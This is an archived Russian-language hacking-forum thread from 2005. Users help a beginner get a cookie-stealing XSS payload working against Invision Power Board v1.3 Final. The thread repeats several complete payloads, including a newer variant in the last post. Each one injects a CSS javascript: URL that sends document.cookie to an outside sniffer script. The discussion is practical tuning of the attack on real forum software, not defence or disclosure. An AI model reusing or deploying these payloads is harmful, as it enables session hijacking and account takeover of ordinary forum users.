Просмотр полной версии : Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final
rsha1988
31.01.2005, 18:36
В форуме Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.
вставляю :
'>` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
И чето не каких кук в снифере не вижу!
Что я сделал неправильно? :confused:
В файнале фильтруются многие символы...
Посмотри Html
Кстати фильтр мешает ещё и спаренные тэги использовать
rsha1988
31.01.2005, 19:51
А можно чуть чуть по подробнее?
Я вставляю в сообщение эту фигню:
'>` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
и она не меняеться не фига когда попадает в тему, так же и остаеться!
А к какому тэгу у тебя style в итоге относится?
rsha1988
31.01.2005, 23:45
Фиг знает....
Я же всетаки начанающий...
Вообще-то баг работает через определенные теги!
например:
http://1.ru e=`` style=display:none;background:url(javascript:docum ent.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) Lol
Читай внимательнее инфу на сайте!!
http://antichat.ru/txt/IPB/
rsha1988, напиши как парсится в предпросмотре....
rsha1988
07.02.2005, 03:01
rsha1988, напиши как парсится в предпросмотре....
переведи...
BlackPrince
07.02.2005, 06:39
переведи...
Скажи, что получается в HTML
rsha1988
08.02.2005, 20:14
http://1.ru e=`` style=display:none;background:none;background:url( javascript:docum ent.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) Lol - эт и получаеться!
правая кнопка крысы для осла, просмотр html кода и ищи все с втоими данными, как оно спарсилось в предпросмотре...
(-=util=-)
15.02.2005, 01:44
Это к старым движкам.
Новое вот
http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?OOOOOOOOOOOOOOO"+document.cookie)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot